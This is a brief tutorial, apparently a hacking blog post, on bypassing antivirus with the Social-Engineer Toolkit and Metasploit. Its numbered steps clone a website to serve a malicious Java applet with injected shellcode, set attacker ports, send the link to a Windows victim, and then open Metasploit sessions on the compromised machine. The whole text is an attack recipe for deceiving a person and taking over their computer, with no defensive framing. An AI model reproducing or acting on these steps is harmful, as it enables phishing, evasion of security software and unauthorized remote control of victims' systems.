Bypass Antivirus using S.E.T

Bypass Antivirus using multyply injector shell code using SET & Metasploit.


Victim`s O.S.- windows.

Attacker:- S.E.T ,Metasploit.

(1)Open terminal & type following command

sudo bash

cd /opt/set


(2)Now select option 1 social engineering attack

(3)Select option 2 website attack vector

(4)Now we will choose the option 1 the Java Applet Attack Method

(5)Now we will choose option 2, “Site Cloner”

(6)Enter the URL to clone: (but you can use any website to run the Java Applet)

(7)Now choose 16 “Multi PyInjector Shellcode Injection”,

(8)Port of the attacker computer. In this example I use port 443

(9)Select the payload you want to deliver via shellcodeexec press enter here

(10)Now again select Port of the attacker computer. In this example I use port 444 and 445

(11)Select the payload you want to deliver via shellcodeexec press enter here

(12)send your I.p. To victim. As soon as he open link & run java applet you have access of victim `s pc

(13)sessions -l

(14)sessions -i I.d

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